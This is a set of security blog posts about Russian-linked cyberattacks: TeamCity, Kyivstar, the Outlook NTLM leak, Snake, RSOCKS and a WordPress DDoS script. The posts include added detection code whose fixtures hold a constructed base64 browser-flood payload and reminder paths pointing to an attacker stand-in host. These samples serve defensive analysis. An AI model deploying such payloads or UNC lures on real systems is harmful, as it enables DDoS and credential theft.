Microsoft became a point of interest for the group back in 2022, when it managed to hack an auxiliary SSO system for Windows Server. 2023, though, became the year of a “proper” hack: from November 2023, APT29 stayed in the network for quite some time, compromising a number of different internal systems. Given the uncertainty about how much was compromised, they will certainly be back.

JetBrains Vulnerability Exploited by CozyBear Hackers
https://gridinsoft.com/blogs/jetbrains-vulnerability-exploited-cozybear/ (published Mon, 18 Dec 2023 22:03:15 +0000)

JetBrains' TeamCity servers became a target of the Russian-backed threat actor CozyBear. Using a vulnerability disclosed in September 2023, the hackers were able to execute arbitrary code without any authentication.

TeamCity Vulnerability Exploited by CozyBear

JetBrains TeamCity servers, a widely used component of the software development lifecycle, have been targeted in a campaign that draws comparisons with the infamous SolarWinds hack. CozyBear, a group backed by the Russian Foreign Intelligence Service (SVR), exploited a severe vulnerability in these servers, tracked as CVE-2023-42793. The flaw lets an unauthenticated attacker bypass authentication and execute code remotely, without any user interaction. This puts over 30,000 JetBrains customers worldwide at risk.

The exploit was first observed in September and has since been used to compromise a wide range of companies and over a hundred devices worldwide, affecting organizations in the United States, Europe, Asia, and Australia. The victims span sectors from billing and finance to gaming and medical devices. The breadth of the impact underlines the critical nature of the flaw and the tactics of CozyBear, previously known for the SolarWinds supply chain attack in 2020.

CozyBear Tactics and Techniques

After exploiting the TeamCity servers, CozyBear leaned heavily on Mimikatz, a well-known tool for extracting credentials from Windows memory and from saved registry hives. It helped them harvest credentials and escalate their privileges within the compromised systems, giving the group deeper and broader control over the affected environment.

To further enhance stealth, CozyBear deployed the GraphicalProton backdoor. This backdoor uses ordinary cloud storage services such as OneDrive and Dropbox for command and control, hiding the exchanged data inside randomly generated BMP files. Blending malicious traffic into regular cloud-storage traffic significantly reduces the likelihood of detection.

Another SolarWinds Attack?

The 2020 SolarWinds attack is often linked to the company's credentials being publicly exposed on GitHub. Cybersecurity researcher Vinoth Kumar found that the password for SolarWinds' update server had been openly accessible in a public repository since 2018 and reported it to the company in 2019, but nobody seems to have paid attention at the time. The attack compromised high-profile targets and affected about 18,000 SolarWinds customers.

Prompt action in response to security lapses is crucial. The SolarWinds attack underscores the ongoing and evolving challenge of cybersecurity in a highly interconnected world, where vigilance and proactive defense are essential. The reality we see today, with TeamCity servers left unpatched for months, suggests the lesson has not been learned.

Mitigation and Response

JetBrains has released a patch and recommends applying it immediately. The fix is included in TeamCity server version 2023.05.4 and later. Despite this, Shadowserver data shows that about 800 instances worldwide remain unpatched, over 230 of them in the United States. Ignoring updates and then paying the price for it seems to be becoming a trend.

Kyivstar, Ukraine’s Biggest Cell Carrier, Hacked
https://gridinsoft.com/blogs/kyivstar-hacked/ (published Wed, 13 Dec 2023 16:38:44 +0000)

On Tuesday, December 12, 2023, Ukraine's largest cellular operator, Kyivstar, had its network infrastructure crippled. This is the result of a hack most likely carried out by a Russian threat actor.

I considered delaying this post to gather more facts about the situation. On day 1, nothing but speculation and suppositions was available. Today some of the facts have surfaced, allowing me to give a more comprehensive analysis of the case.

Ukrainian Mobile Operator Kyivstar Hacked by Russians

Early on December 12, Kyivstar services stopped working. Since the company is not only a cell carrier but also provides home Internet and connectivity services for businesses, those were down as well. The “national roaming” option, which allows switching between operators with certain limitations, was unresponsive, meaning the network core itself was severely disrupted.

At around 12:00, the first official comments from the company appeared. They acknowledged a cyberattack that had disrupted their services and warned of a rather long recovery process ahead. Further statements put the estimated recovery of major services no earlier than December 13.

Kyivstar's statement on the situation, posted on Twitter

Until the evening of the same day, details were scarce. Some analysts tried to draw conclusions, though they were blurry at best. Certain sources also assumed that Kyivstar suffered outages due to a DDoS attack, but that was most likely confusion with a simultaneous DDoS attack on one of the Ukrainian banks. Meanwhile, the company managed to restore part of its services, particularly home Internet, by the end of the day.

On the morning of December 13, 2023, some facts and even more rumors began to surface. The loudest of the latter was a responsibility claim from a previously unknown threat actor calling itself Solntsepek. The gang published its statement along with screenshots of what it claims is the inside of the hacked network. I strongly doubt the credibility of both the claim and the screenshots, since no one had heard of the group before and the pictures contain no identifiable details.

Unpredicted outcomes

As Kyivstar is the biggest cellular operator in Ukraine, the outage caused obvious trouble for over 24 million subscribers. With the country's population at around 40 million, the outage touched every second citizen to some extent. That clearly exposed how dependent people are on technology nowadays, but some of the consequences of the Kyivstar hack were less obvious.

Stats of the Ukrainian telecom market. Source: Telegeography

For instance, the air raid alarm systems, a vital thing in a country at war, relied on Kyivstar's cell network in many places. As a result, numerous cities across the country did not sound air raid alarms, and even online air raid maps failed to work properly. That is especially unfortunate since missile and UAV strikes happen daily.

What is less unfortunate for Ukraine is that Russian troops in the occupied parts of the Kherson and Zaporizhzhia regions experienced coverage issues as well. Since the invaders used stolen SIM cards of Ukrainian operators, their phones stopped working once the attack happened. Payback for stolen SIM cards, one may say.

Occupying troops complain about being hit by the Kyivstar takedown, too

Kyivstar Hack – Who is Responsible?

Symptoms aside, let's think about what exactly happened and who is responsible for the hack. The nature of the destruction and the pace of the recovery suggest that the hackers had established persistence in the majority of the corporate network's infrastructure elements and then destroyed everything they could reach. This was not just a “DROP DATABASE”, as someone suggested earlier; in that case the recovery would not take nearly this long. Moreover, Kyivstar itself says it is forced to restore the network “piece by piece”.

Kyivstar network accessibility stats. Source: NetBlocks

The perpetrator is most likely one of the Russian APT groups. Admittedly, there is no confirmation, but nobody except Russians hacks Ukrainian companies for pure vandalism. Even though I doubt the claims of a no-name hacking group, the nationality of the hackers is almost certain.

Another share of the responsibility lies with Kyivstar itself. Serving such a large number of users brings significant responsibility, not only for service availability but also for data safety. Addresses, passport details, phone numbers, emails: all of this was reportedly leaked. Bad luck for a country in peacetime, culpable negligence for a country at war.

If the screenshots shared by the Solntsepek group are real, things could be much worse. An analyst under the nickname Sean Townsend shares his reading of what the pictures show. Spoiler: things may be extremely bad, and security may have been non-existent altogether.

Worst-case scenario for Kyivstar

Update 12/13 (21:00 GMT)

Olexandr Komarov, CEO of Kyivstar, revealed some details about how the hack began: initial access was gained through a compromised employee account.

“We have to admit that this attack breached our defense. This happened because the account pool was compromised, the account of one of our employees was compromised, and the enemy was able to get inside the company’s infrastructure. The investigation is ongoing.”

Are Other Companies in Danger?

What is the conclusion? This is what every Ukrainian company should be ready to counter. And not only Ukrainian: Russian hackers now face no limitations in attacks on countries “hostile” to Russia. Since these hackers aim purely at vandalism and do not try to monetize their work, the effects can be rapid and irreversible. A sturdy, well-engineered security posture should be mandatory for every company.

Outlook Vulnerability Exploited by Russian Hackers
https://gridinsoft.com/blogs/outlook-vulnerability-russian-hackers/ (published Tue, 05 Dec 2023 15:39:43 +0000)

A vulnerability in Microsoft Outlook is under active exploitation: that is the worrying notice from Microsoft. The world's largest software developer warns that Russian state-sponsored hackers are using this flaw in cyberattacks. Despite the fix having been released over 8 months ago, a concerning number of instances remain unpatched.

Microsoft Outlook Vulnerability Used by Kremlin-Backed Hackers

CVE-2023-23397, an elevation-of-privilege bug, received a near-maximum CVSS score of 9.8. The rating was assigned in March 2023, when the vulnerability was originally disclosed, and the flow of attacks built on it since then confirms every bit of that score.

In essence, the vulnerability lets an attacker leak a victim's Net-NTLMv2 response by sending a specially crafted email message, with no user interaction required. The attack abuses the PidLidReminderFileParameter property of a calendar item or task, which tells Outlook where to find the sound file to play for the reminder. If that property points to a UNC path on an attacker-controlled SMB server, Outlook connects to it when the reminder fires and authenticates with the user's Net-NTLMv2 credentials, which the attacker's server captures. That is all there is to the exploit itself, but the main course of action happens afterwards.
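The property check described above, as an added Python example that is not part of the original post and not Microsoft's own detection script: it takes PidLidReminderFileParameter values already extracted from mailbox items (the sample records, host names, the allow-list and the internal DNS suffix are constructed assumptions) and flags every value that would make Outlook open an authenticated connection to a host you do not trust.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Assumed allow-list of internal file servers that may legitimately host reminder sounds.
TRUSTED_HOSTS = {"fileserver.corp.example"}
# Assumed internal DNS suffix; any other dotted name is treated as external.
INTERNAL_SUFFIXES = (".corp.example",)

# RFC 1918 ranges plus loopback. ipaddress.is_private would also match documentation
# ranges such as 203.0.113.0/24, which we deliberately want to see as "not our LAN".
LAN_NETS = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# \\host\share\... or //host/share/...; the host token ends at the next path separator.
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)")


def extract_unc_host(value):
    """Return the remote host a reminder-file value would make Outlook connect to,
    or None for local paths, which trigger no network authentication at all."""
    v = value.strip()
    if v.lower().startswith("file:"):
        host = urlsplit(v).hostname          # file:///C:/... yields no host
    else:
        m = UNC_RE.match(v)
        host = m.group(1) if m else None
    return host.lower() if host else None


def classify_host(host):
    """trusted / internal / external for names, internal / public for IP literals."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        if host in TRUSTED_HOSTS:
            return "trusted"
        if "." not in host or host.endswith(INTERNAL_SUFFIXES):
            return "internal"
        return "external"
    return "internal" if any(ip in net for net in LAN_NETS) else "public"


# An outbound SMB authentication to the Internet is the textbook leak; a UNC path
# to an internal host is still unusual for a reminder sound and worth a look.
SEVERITY = {"public": "high", "external": "high", "internal": "medium"}


def scan_reminder_paths(records):
    """records: iterable of (message_id, PidLidReminderFileParameter value).
    Returns one finding per value that would cause an authenticated connection
    to a host outside the allow-list."""
    findings = []
    for msg_id, value in records:
        host = extract_unc_host(value)
        if host is None:
            continue
        kind = classify_host(host)
        if kind == "trusted":
            continue
        findings.append({"message": msg_id, "host": host,
                         "kind": kind, "severity": SEVERITY[kind]})
    return findings


# Constructed sample records (not taken from any real mailbox).
SAMPLE_RECORDS = [
    ("msg-001", r"C:\Windows\Media\chimes.wav"),                # local file, harmless
    ("msg-002", r"\\fileserver.corp.example\sounds\ding.wav"),  # allow-listed server
    ("msg-003", r"\\203.0.113.7\share\reminder.wav"),           # Internet SMB host
    ("msg-004", "file://attacker.example.net/s/a.wav"),         # file: URL form
    ("msg-005", r"\\10.0.0.5\share\b.wav"),                     # internal, unusual
]

if __name__ == "__main__":
    for finding in scan_reminder_paths(SAMPLE_RECORDS):
        print(finding)
```

The property values themselves have to come from somewhere: on Exchange they can be pulled per mailbox with EWS or Graph, and on a client-side .msg/.pst export with a MAPI property reader. Whatever the source, the triage logic stays the same, and anything with severity “high” deserves an incident ticket rather than a cleanup.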

Forest Blizzard Exploits MS Outlook in Attacks on Poland

Microsoft researchers observed one main threat actor using CVE-2023-23397 in its attacks: Forest Blizzard, a.k.a. APT28/Fancy Bear. This threat actor has a proven connection to the Russian government, specifically to the Main Intelligence Directorate (GRU). In the campaign exploiting the Outlook vulnerability, the hackers primarily targeted Poland.

Scheme of the MS Outlook exploitation used by APT28

Using the captured Net-NTLMv2 credentials against the victim's Exchange server, the adversaries were able to modify the access permissions of specific mailbox folders, which in turn allowed them to read all of their contents. The hackers specifically went after folders likely to hold valuable and potentially sensitive information.

Such targeting is unsurprising: Poland's relations with Russia have been in ruins since February 2022, and its role in delivering supplies to Ukraine is of obvious interest to Russian intelligence. While this espionage uses the same tactics that cybercriminals apply in attacks on corporations, the final goal differs. Nothing, though, stops the hackers from applying the same tactics in attacks on other countries.

Install the Patch, Microsoft Insists

As mentioned at the beginning, the patch for CVE-2023-23397 has been available since March 2023; Microsoft released it in the same update that disclosed the bug. Because the flaw lies in how Outlook handles the reminder property, mitigation without the patch is limited, though Microsoft did recommend blocking outbound TCP 445 at the perimeter and adding high-value users to the Protected Users security group so that NTLM cannot be used for them. Even if updating every instance right after the patch was troublesome, there has been plenty of time to arrange it.

The FBI Disrupted the Cyberspyware “Snake” that the Russian FSB Used for 20 Years
https://gridinsoft.com/blogs/fsb-cyberspyware/ (published Wed, 10 May 2023 08:19:59 +0000)

On Tuesday, the US Federal Bureau of Investigation reported the disruption of a massive espionage program run by the Russian Federal Security Service (FSB) using spyware codenamed “Snake”.

This is stated in a press release from the US Department of Justice.

Let me remind you that we also wrote about Europe's largest private hospital operator, Fresenius, being attacked with the eponymous Snake ransomware. Don't be confused: here we are talking about a completely different malware.

Matthew J. Olsen

US law enforcement believes the spy tool was used by a hacker unit of the FSB's 16th Center, known as “Turla”, for almost 20 years. We also reported on a Fake DDoS App from Turla that targets pro-Ukrainian hacktivists.

“For 20 years, the FSB has relied on the Snake malware for cyber espionage against the United States and our allies – that ends today,” said Assistant Attorney General Matthew J. Olsen of the Justice Department's National Security Division.

The Snake program was designed to steal confidential documents from hundreds of computer systems in at least 50 countries, belonging to the governments of NATO members, the United States in particular, as well as to journalists and other persons of interest to the Russian Federation.

“Russia used sophisticated malware to steal sensitive information from our allies, laundering it through a network of infected computers in the United States in a cynical attempt to conceal their crimes. Meeting the challenge of cyberespionage requires creativity and a willingness to use all lawful means to protect our nation and our allies,” said U.S. Attorney Breon Peace for the Eastern District of New York.

To eliminate Snake, the FBI carried out an operation code-named “Medusa”. Within it, the spyware was made to overwrite its own vital components, which disabled it. A senior FBI official said the Bureau's tool was designed solely to communicate with the Russian spyware.

“He speaks the Snake language and communicates using Snake’s custom protocols without accessing the victim’s private files,” the official said.

At a briefing ahead of the announcement, a US official involved in the operation called Snake the “prime tool” of Russia's cyber-espionage, Reuters reported. He expressed the hope that, with the program dismantled, Moscow could be “eradicated from the virtual battlefield.”

The media also reported earlier that the FBI and NSA discovered Drovorub malware, created by Russian intelligence services.

Companies Manage to Bargain With Ransomware Racketeers
https://gridinsoft.com/blogs/companies-bargain-ransomware/ (published Fri, 17 Jun 2022 17:02:05 +0000)

Revelations of the Ransom-Negotiator

In May, a ransom negotiator working for a European production company received an unexpected chat message from the attacker who had hacked the negotiator's client.

Ransom negotiations, aimed at lowering the attackers' demands, are a field dominated by lawyers, consultancies, and information security companies that know the nuts and bolts of dealing with hacker groups. Palo Alto Networks research shows that the average ransom demand in 2021 grew to $2.2 million, twice the previous year's figure, while victims usually pay less than half of the initial demand (around $541,000).

The negotiator shared this story on condition of anonymity, since he is not at liberty to discuss the details of his work. His job is to soften the extortionists' demands.

“We need to know that you are honest with us,” said the criminals, who had become startled and nervous during the conversation and demanded a copy of the expert's contract with the victim as proof that his work was legitimate.

The expert said the crooks feared he would take an extra cut out of the ransom amount.

After that, the hackers unexpectedly offered to share the details of their other victims with the negotiator so that he would work for them, even offering a fee for each client. He refused.

As the expert concludes, the racketeers who contacted him were part of the Haron ransomware group. (The 2021 attack on Colonial Pipeline, which stalled fuel supplies on the US East Coast and was followed by arrests of members of Russia-linked hacking groups, is attributed to DarkSide, a different gang.)

The US Department of Justice Reports a Russian Botnet Dismantled
https://gridinsoft.com/blogs/russian-botnet-dismantled/ (published Fri, 17 Jun 2022 14:19:36 +0000)

RSOCKS Russian Botnet Is No More as a Result of a Joint Operation

According to a June 16 report by the US Department of Justice, the Russian botnet RSOCKS has been taken down in a joint operation by US, German, Dutch, and British law enforcement agencies.

RSOCKS is responsible for compromising millions of network-connected devices. Initially the botnet targeted IoT devices, a category that includes industrial control systems, which is what makes threats like this one so serious. Later the operators infected Android devices and ordinary PCs as well.

Law enforcement had long been aware of RSOCKS. The botnet came under police scrutiny in 2017, when undercover purchases by the FBI's San Diego field office identified over 300,000 compromised devices worldwide, some of them in San Diego County.

The operators monetized their access through a website where customers could rent a segment of the botnet for a day, a week or a month. Prices ranged from $30 per day for 2,000 proxies to $200 per day for 90,000 compromised IPs. Customers could then use the bots for whatever they liked: DDoS attacks, traffic routing, fake comments, and so on.

The operation involved undercover purchases of proxies, followed by tracing the traffic back to the botnet's back end and its victims. Eventually, the authorities dismantled the botnet's infrastructure. The Department credited the contribution of the partner agencies abroad and of the private-sector cybersecurity firm Black Echo.

The operation is part of a broader campaign against cybercrime consistently conducted by the US and Interpol, clearly concentrated on Russia-originating threats.

Ukraine Was Hit by DDoS Attacks from Hacked WordPress Sites https://gridinsoft.com/blogs/ukraine-was-hit-by-ddos-attacks/ https://gridinsoft.com/blogs/ukraine-was-hit-by-ddos-attacks/#respond Sun, 01 May 2022 20:02:24 +0000 https://gridinsoft.com/blogs/?p=7665 Ukrainian Computer Emergency Response Team (CERT-UA) said that Ukraine was hit by large-scale DDoS attacks. CERT-UA has published a report on ongoing DDoS attacks on Ukrainian websites and a government web portal. Unknown attackers compromise WordPress sites and inject malicious JavaScript code into the HTML structure. The script is base64 encoded to avoid detection like […]

The post Ukraine Was Hit by DDoS Attacks from Hacked WordPress Sites appeared first on Gridinsoft Blog.

Ukrainian Computer Emergency Response Team (CERT-UA) said that Ukraine was hit by large-scale DDoS attacks.

CERT-UA has published a report on ongoing DDoS attacks on Ukrainian websites and a government web portal.

Unknown attackers compromise WordPress sites and inject malicious JavaScript into the HTML of their pages. The script is base64-encoded to evade simple signature-based detection, as shown in the image below.

[Image: Ukraine hit by DDoS attacks]

“The Ukrainian Government Computer Emergency Response Team CERT-UA, in close cooperation with specialists from the National Bank of Ukraine (CSIRT-NBU), has taken measures to investigate DDoS attacks, for which attackers place malicious JavaScript code (BrownFlood) in the structure of web pages and files of compromised websites (primarily those running WordPress), whereby the computing resources of the computers of visitors to such websites are used to generate an abnormal number of requests to attack targets whose URLs are statically defined in malicious JavaScript code,” CERT-UA specialists reported.

The script runs in the visitor's browser and floods the hard-coded target URLs with requests in an attempt to take those sites offline. The attacks happen without the knowledge of the compromised sites' owners and cause only subtle performance degradation for visitors, which is why they can go unnoticed for a long time.
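To make the injection concrete, here is an added analysis helper that is not code from the original post or from CERT-UA: it scans a page's HTML for inline scripts carrying a long base64 blob, decodes the blob, and pulls out the statically defined target URLs the report describes. The compromised page, the loader pattern (eval(atob(...))), the payload text and the target hostnames are all constructed for this example; real injections vary in how they unpack the payload, which is why the scanner keys on the base64 blob rather than on a specific loader.

```python
import base64
import re
import sys

# Constructed sample page: a WordPress-style <head> with one injected inline
# script that unpacks its real payload from base64 via eval(atob(...)).
# The payload text and the target hostnames are assumptions for this example.
_PAYLOAD_JS = (
    'var targets=["https://target-a.example/","https://target-b.example/api"];'
    'setInterval(function(){targets.forEach(function(u){'
    'fetch(u+"?_="+Math.random(),{mode:"no-cors"});});},100);'
)
_PAYLOAD_B64 = base64.b64encode(_PAYLOAD_JS.encode()).decode()

SAMPLE_PAGE = f"""<!DOCTYPE html>
<html><head><title>Blog</title>
<script>eval(atob("{_PAYLOAD_B64}"));</script>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
</head><body><p>Hello</p></body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# A base64 run long enough to be a payload rather than an ordinary identifier.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Hallmarks of request-generating code; any one is enough to report the script.
REQUEST_MARKERS = ("fetch(", "XMLHttpRequest", "new Image(", "sendBeacon(")


def decode_blobs(script_body):
    """Return every base64 blob in an inline script that decodes to UTF-8 text."""
    decoded = []
    for blob in B64_RE.findall(script_body):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 after all, or binary data: skip it
    return decoded


def find_injected_scripts(html):
    """List (decoded_js, [target_urls]) for inline scripts hiding a payload in base64."""
    findings = []
    for body in SCRIPT_RE.findall(html):
        for js in decode_blobs(body):
            urls = URL_RE.findall(js)
            if urls or any(marker in js for marker in REQUEST_MARKERS):
                findings.append((js, urls))
    return findings


def scan_file(path):
    """Scan one HTML/PHP/JS file on disk and return its findings."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_injected_scripts(fh.read())


if __name__ == "__main__":
    # With file paths as arguments, scan those; otherwise scan the constructed page.
    results = [scan_file(p) for p in sys.argv[1:]] or [find_injected_scripts(SAMPLE_PAGE)]
    for findings in results:
        for js, urls in findings:
            print("injected script targets:", urls)
            print("decoded payload:", js[:120])
```

Point it at theme and plugin files under the WordPress install to find where the script was planted; the decoded target list is also what you would hand to the operators of the attacked sites, since those URLs are fixed in the payload.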

By the way, we have already written about how the State Department Offers $1 million for Info on Russian Hackers.

CERT-UA is working closely with the National Bank of Ukraine on protective measures against this DDoS campaign and the many earlier cyberattacks. In its report, the CERT-UA team provided instructions for removing the malicious JavaScript and a threat detection tool for scanning sites for signs of compromise.

“To detect such activity in the web server log files, you should look for events with a 404 response code and, if they are non-standard, correlate them with the values of the “Referer” HTTP header, which indicates the address of the web resource that created the request,” advises CERT-UA.
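The log check CERT-UA describes, as an added example that is not part of the original post or of CERT-UA's tooling: it parses access log lines in the combined format that Apache and nginx write by default, keeps the 404 responses, groups them by the site named in the Referer header, and flags referring sites that produce many 404s for many different paths from many distinct client IPs, which is the fingerprint of a flood driven by visitors' browsers rather than a single broken link. The log lines, the hostname blog-a.example and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Combined log format as written by Apache and nginx by default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed access log of an attacked site: three visitors of a compromised
# blog (blog-a.example, an assumed hostname) each fire cache-busting requests at
# a path that does not exist, plus ordinary traffic and one genuinely broken link.
SAMPLE_LOG = """\
203.0.113.10 - - [29/Apr/2022:10:00:01 +0300] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Apr/2022:10:00:02 +0300] "GET /api/?_=0.8842 HTTP/1.1" 404 153 "https://blog-a.example/news/1" "Mozilla/5.0"
198.51.100.7 - - [29/Apr/2022:10:00:02 +0300] "GET /api/?_=0.1194 HTTP/1.1" 404 153 "https://blog-a.example/news/1" "Mozilla/5.0"
198.51.100.23 - - [29/Apr/2022:10:00:02 +0300] "GET /api/?_=0.5520 HTTP/1.1" 404 153 "https://blog-a.example/" "Mozilla/5.0"
198.51.100.23 - - [29/Apr/2022:10:00:03 +0300] "GET /api/?_=0.7301 HTTP/1.1" 404 153 "https://blog-a.example/" "Mozilla/5.0"
198.51.100.42 - - [29/Apr/2022:10:00:03 +0300] "GET /api/?_=0.0047 HTTP/1.1" 404 153 "https://blog-a.example/about" "Mozilla/5.0"
198.51.100.42 - - [29/Apr/2022:10:00:03 +0300] "GET /api/?_=0.9138 HTTP/1.1" 404 153 "https://blog-a.example/about" "Mozilla/5.0"
203.0.113.55 - - [29/Apr/2022:10:00:04 +0300] "GET /old-page HTTP/1.1" 404 153 "https://www.google.com/" "Mozilla/5.0"
203.0.113.56 - - [29/Apr/2022:10:00:05 +0300] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.57 - - [29/Apr/2022:10:00:06 +0300] "GET /contact HTTP/1.1" 200 2210 "https://www.google.com/" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def collect_404s(lines):
    """Group 404 responses by referring site: hit count, client IPs, request paths."""
    stats = defaultdict(lambda: {"hits": 0, "ips": set(), "paths": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != "404" or rec["referer"] == "-":
            continue
        site = urlparse(rec["referer"]).netloc  # one compromised site, many pages
        s = stats[site]
        s["hits"] += 1
        s["ips"].add(rec["ip"])
        s["paths"].add(rec["path"])
    return stats


def flag_referers(lines, min_hits=5, min_ips=3):
    """Return referring sites whose 404 pattern looks like a browser-driven flood."""
    flagged = {}
    for site, s in collect_404s(lines).items():
        # A broken link yields a few 404s for one path from whoever clicks it; a
        # flood yields many 404s for ever-changing paths from every visitor of the
        # compromised page, so both the hit count and the IP spread must be high.
        if s["hits"] >= min_hits and len(s["ips"]) >= min_ips:
            flagged[site] = {"hits": s["hits"], "ips": len(s["ips"]), "paths": len(s["paths"])}
    return flagged


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LOG.splitlines()
    for site, info in flag_referers(lines).items():
        print(f"suspicious referer {site}: {info}")
```

On a real log raise the thresholds to match the site's normal 404 volume, and treat a flagged site as a lead rather than a verdict: the next step is to fetch that referring page and look for the injected script, since the site owner is usually a victim too.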

In addition, it is important to keep the site's content management system (CMS) up to date, update its plugins, and restrict access to the site's administration interface.

We also note that the Chinese comrades do not seem to be supporting Russian hackers: we wrote that Chinese Mustang Panda Cyberspies Attack Russian Officials.
